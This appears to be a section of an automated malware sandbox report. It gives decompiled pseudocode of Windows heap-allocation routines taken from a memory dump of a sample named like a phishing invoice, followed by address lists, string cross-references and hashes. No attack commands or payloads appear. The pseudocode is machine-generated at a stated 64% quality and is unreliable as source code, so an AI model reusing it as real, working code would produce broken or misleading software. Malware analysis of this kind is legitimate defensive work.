						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E00AEA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0xbd8748 - 1;
						if( *0xbd8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E00AEB150();
								} else {
									E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00AEB150();
								__eflags =  *0xbd7bc8;
								if( *0xbd7bc8 == 0) {
									__eflags = 1;
									E00BA2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0xbd8748 - 1;
							if( *0xbd8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E00B1174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E00B07D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E00BA14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E00AE9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E00AE9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0xbd8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E00AEB150();
											} else {
												E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E00AEB150();
											_pop(_t491);
											__eflags =  *0xbd7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E00BA2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E00BAA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E00B0A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E00B07D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E00B07D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E00BA1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E00B07D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E00B07D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0xbd8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E00AEB150();
							} else {
								E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E00AEB150();
							__eflags =  *0xbd7bc8;
							if( *0xbd7bc8 == 0) {
								__eflags = 0;
								E00BA2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0xbd8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E00AEB150();
												} else {
													E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E00AEB150();
												__eflags =  *0xbd7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E00BA2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E00BAA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E00B0A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E00B0B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E00B0A830(_t553, _v64, _v24);
								_t286 = E00B07D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E00B07D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E00BA1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E00B07D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E00B07D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E00BA1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E00B1174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E00B0B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E00B07D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E00BA14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E00B099BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E00B0A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E00B1ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x00b0a309
0x00b0a316
0x00b0a319
0x00b0a31d
0x00b0a32d
0x00b0a331
0x00b51e0d
0x00b51e10
0x00b0a3cb
0x00b0a3cb
0x00b0a3bd
0x00b0a3c3
0x00b0a3c3
0x00b0a33a
0x00b51e17
0x00b51e1b
0x00b51e1d
0x00b51e2f
0x00b51e34
0x00b51e36
0x00b51e3c
0x00b51e3c
0x00b51e3c
0x00b51e3c
0x00b51e36
0x00b51e42
0x00b51e45
0x00b51e47
0x00b0a3f8
0x00b0a3f8
0x00b0a3fb
0x00b0a3fd
0x00b51e50
0x00b0a403
0x00b0a411
0x00b0a411
0x00b0a411
0x00b0a41e
0x00b0a420
0x00b0a424
0x00b0a427
0x00b0a7c9
0x00b0a7cd
0x00b0a7d2
0x00b0a7d9
0x00b0a7e0
0x00b0a7e3
0x00b0a7ed
0x00b0a7f3
0x00b0a7f9
0x00b0a7ff
0x00b0a802
0x00b0a807
0x00b0a809
0x00b0a809
0x00b0a809
0x00b0a80f
0x00b0a80f
0x00b0a812
0x00b0a81c
0x00b0a821
0x00b0a824
0x00b0a42d
0x00b0a42d
0x00b0a42d
0x00b0a42d
0x00b0a42d
0x00b0a436
0x00b0a43a
0x00b0a609
0x00b0a60d
0x00b0a612
0x00b0a616
0x00b0a61a
0x00b51e57
0x00b51e59
0x00000000
0x00000000
0x00b51e5f
0x00b0a620
0x00b0a627
0x00b51e64
0x00b51e66
0x00b51e6c
0x00b51e72
0x00b51e76
0x00b51e95
0x00b51e9a
0x00b51e78
0x00b51e8d
0x00b51e92
0x00b51ea0
0x00b51ea5
0x00b51eaa
0x00b51eb2
0x00b51eb6
0x00b51eb9
0x00b51eb9
0x00b51ebe
0x00b51ec2
0x00b51ec2
0x00b51e66
0x00b0a62d
0x00b0a633
0x00b0a636
0x00b0a63a
0x00b0a63c
0x00b0a640
0x00b0a642
0x00b0a644
0x00b0a644
0x00b0a644
0x00b0a64d
0x00b0a64d
0x00b0a651
0x00b0a655
0x00b51eca
0x00b51ed1
0x00000000
0x00000000
0x00b51ed7
0x00000000
0x00b0a65b
0x00b0a669
0x00b0a66e
0x00b0a670
0x00000000
0x00000000
0x00b0a676
0x00b0a67b
0x00b0a680
0x00b0a682
0x00b51f1a
0x00b0a688
0x00b0a688
0x00b0a688
0x00b0a68a
0x00b0a68d
0x00b51f24
0x00b51f2a
0x00b51f31
0x00b51f43
0x00b51f43
0x00b51f31
0x00b0a693
0x00b0a697
0x00b0a69d
0x00b0a6a0
0x00b0a6a6
0x00b0a6a8
0x00b0a6a8
0x00b0a6a8
0x00b0a6a8
0x00b0a6b2
0x00b0a6b7
0x00b0a6c1
0x00b0a6c6
0x00b0a6d2
0x00b0a6d9
0x00b0a6e3
0x00b0a6e6
0x00b0a6eb
0x00b0a6ed
0x00b0a6ed
0x00b0a6ed
0x00b0a6ed
0x00b0a6f3
0x00b0a6f8
0x00b0a702
0x00b0a70a
0x00b0a70e
0x00b0a71a
0x00b0a71e
0x00b51fcb
0x00b51fcf
0x00b51fdd
0x00b51fe3
0x00b51fe3
0x00b0a724
0x00b0a728
0x00b0a72a
0x00b0a72d
0x00b0a737
0x00b0a73a
0x00b0a73c
0x00b0a742
0x00b0a748
0x00b51f4d
0x00b51f50
0x00b51f56
0x00b51f5c
0x00b51f5f
0x00b51f7e
0x00b51f83
0x00b51f61
0x00b51f76
0x00b51f7b
0x00b51f89
0x00b51f8e
0x00b51f93
0x00b51f94
0x00b51f9a
0x00b51f9c
0x00b51f9e
0x00b51fa1
0x00b51fa1
0x00b51fa6
0x00b51fa6
0x00b51f50
0x00b0a74e
0x00b0a751
0x00b0a754
0x00b0a75d
0x00b0a75e
0x00b0a762
0x00b0a767
0x00b51faf
0x00b51fb0
0x00b51fb9
0x00b51fbe
0x00b51fc2
0x00b51fc2
0x00b0a76d
0x00b0a76d
0x00b0a775
0x00b0a778
0x00b0a77d
0x00b0a77d
0x00b0a71e
0x00b0a782
0x00b0a787
0x00b0a789
0x00b51ff3
0x00b0a78f
0x00b0a78f
0x00b0a78f
0x00b0a791
0x00b0a794
0x00b51ffd
0x00b52006
0x00b5200c
0x00b52017
0x00b52019
0x00b52024
0x00b52024
0x00b52024
0x00b52047
0x00b52047
0x00b5200c
0x00b0a79a
0x00b0a79f
0x00b0a7a4
0x00b0a7a9
0x00b0a7ab
0x00b5205a
0x00b0a7b1
0x00b0a7b1
0x00b0a7b1
0x00b0a7b3
0x00b0a7b6
0x00000000
0x00b0a7bc
0x00b52066
0x00b52068
0x00b52073
0x00b52073
0x00b52073
0x00b52078
0x00b52079
0x00b5207d
0x00000000
0x00b5207d
0x00b0a7b6
0x00b0a440
0x00b0a440
0x00b0a440
0x00b0a446
0x00b0a44c
0x00b0a44f
0x00b0a453
0x00b0a455
0x00b520b3
0x00b520b9
0x00b520b9
0x00b0a45d
0x00b0a460
0x00b0a464
0x00b0a466
0x00b0a46b
0x00b0a46f
0x00b0a471
0x00b0a471
0x00b0a471
0x00b0a474
0x00b0a479
0x00b0a47d
0x00b0a47f
0x00b52229
0x00b5222f
0x00b0a3c8
0x00b0a3c8
0x00b0a3ca
0x00b0a3ca
0x00000000
0x00b0a3ca
0x00b52235
0x00b5223a
0x00b5223a
0x00000000
0x00000000
0x00b52240
0x00b52246
0x00b5224a
0x00b52269
0x00b5226e
0x00b5224c
0x00b52261
0x00b52266
0x00b52274
0x00b52279
0x00b5227e
0x00b52286
0x00b52288
0x00b5228d
0x00b5228d
0x00b52292
0x00b52292
0x00b52295
0x00b52295
0x00000000
0x00b52295
0x00b0a485
0x00b0a489
0x00b0a48b
0x00b0a48f
0x00b0a493
0x00b0a497
0x00b0a49b
0x00b0a4bb
0x00b0a4bb
0x00b0a4bd
0x00b0a4ff
0x00b0a4ff
0x00b0a501
0x00b0a505
0x00b0a50f
0x00b0a517
0x00b0a51b
0x00b0a527
0x00b0a52b
0x00b52182
0x00b52185
0x00b52193
0x00b52199
0x00b52199
0x00b0a531
0x00b0a535
0x00b0a538
0x00b0a548
0x00b0a54b
0x00b0a54d
0x00b0a553
0x00b0a559
0x00b52100
0x00b52103
0x00b52109
0x00b5210f
0x00b52112
0x00b52131
0x00b52136
0x00b52114
0x00b52129
0x00b5212e
0x00b5213c
0x00b52141
0x00b52147
0x00b5214d
0x00b52151
0x00b52154
0x00b52154
0x00b52159
0x00b52159
0x00b52103
0x00b0a55f
0x00b0a562
0x00b0a565
0x00b0a567
0x00b52162
0x00b0a56d
0x00b0a574
0x00b0a575
0x00b0a579
0x00b0a57e
0x00b52169
0x00b5216a
0x00b52170
0x00b52175
0x00b52179
0x00b52179
0x00b0a57e
0x00b0a584
0x00b0a58f
0x00b0a58f
0x00b0a52b
0x00b0a5ad
0x00b0a5bc
0x00b0a5c1
0x00b0a5c6
0x00b0a5cb
0x00b0a5cd
0x00b521a9
0x00b0a5d3
0x00b0a5d3
0x00b0a5d3
0x00b0a5d5
0x00b0a5d8
0x00b521b3
0x00b521bc
0x00b521c2
0x00b521cd
0x00b521cf
0x00b521da
0x00b521da
0x00b521da
0x00b521f7
0x00b521f7
0x00b521c2
0x00b0a5de
0x00b0a5e3
0x00b0a5e8
0x00b0a5ea
0x00b5220a
0x00b0a5f0
0x00b0a5f0
0x00b0a5f0
0x00b0a5f2
0x00b0a5f5
0x00b52219
0x00b5221b
0x00b5208c
0x00b5208c
0x00b5208c
0x00b52095
0x00b52096
0x00b52097
0x00b52098
0x00b520a4
0x00b520a5
0x00b520a9
0x00b520a9
0x00000000
0x00b0a5f5
0x00b0a4bf
0x00b0a4d3
0x00b0a4d8
0x00b0a4da
0x00b51ede
0x00b51ede
0x00b51ee4
0x00b51ee9
0x00000000
0x00000000
0x00b51f07
0x00000000
0x00b51f07
0x00b0a4e0
0x00b0a4e5
0x00b0a4e7
0x00b520cb
0x00b0a4ed
0x00b0a4ed
0x00b0a4ed
0x00b0a4f2
0x00b0a4f5
0x00b520d5
0x00b520de
0x00b520e4
0x00b520f6
0x00b520f6
0x00b520e4
0x00b0a4fb
0x00000000
0x00b0a4fb
0x00b0a4a1
0x00b0a4a4
0x00b0a4a8
0x00000000
0x00000000
0x00b0a4aa
0x00b0a4ac
0x00000000
0x00000000
0x00b0a4b2
0x00b0a4b5
0x00000000
0x00000000
0x00000000
0x00b0a4b5
0x00b0a43a
0x00b0a340
0x00b0a346
0x00b0a600
0x00000000
0x00b0a600
0x00b0a34f
0x00b0a351
0x00b0a358
0x00b0a3c6
0x00000000
0x00b0a371
0x00b0a37a
0x00b0a37f
0x00b0a382
0x00b0a384
0x00b0a394
0x00000000
0x00b0a396
0x00b0a399
0x00b0a3a7
0x00b0a3b0
0x00b0a3b4
0x00b0a3bb
0x00b0a3d2
0x00b0a3da
0x00b0a3df
0x00b0a3e1
0x00b0a3e5
0x00b0a3ea
0x00b0a3f0
0x00b0a3f0
0x00b0a3e1
0x00000000
0x00b0a3bb
0x00b0a394

Strings

((LONG)FreeEntry->Size > 1), xrefs: 00B51F89
(UCRBlock != NULL), xrefs: 00B51EA0
(!TrailingUCR), xrefs: 00B52274
HEAP[%wZ]: , xrefs: 00B51E88, 00B51F71, 00B52124, 00B5225C
HEAP: , xrefs: 00B51E95, 00B51F7E, 00B52131, 00B52269
(LONG)FreeEntry->Size > 1, xrefs: 00B5213C

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: c923673e4cc67ef717b20e28e5e8c531018d590ff1ddad659508a1ff2e4d908c
Instruction ID: e34d583b4c2c7770c9cb54fd5c1453c22f83beae51964f3feaf849d9c3ed528d
Opcode Fuzzy Hash: c923673e4cc67ef717b20e28e5e8c531018d590ff1ddad659508a1ff2e4d908c
Instruction Fuzzy Hash: 6542DE316097819FC715DF28C894B2ABBE5FF88304F1449ADF8868B392DB34D985CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2D82, Relevance: 7.7, Strings: 6, Instructions: 228
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00BA2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0xbc0e80);
				E00B3D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E00AE40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E00BA30C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E00AEB150();
						} else {
							E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E00AEB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E00AFEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E00BA4496(_t181, 0);
						_t177 = L00B04620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E00BA49A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E00B9FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E00AE1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E00B116C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
